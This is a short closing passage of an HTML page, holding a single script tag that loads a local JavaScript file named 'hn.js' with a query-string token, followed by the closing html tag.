      <script type='text/javascript' src='hn.js?yE5dZK2wZfJm7XnFvFE9'></script>
  </html>
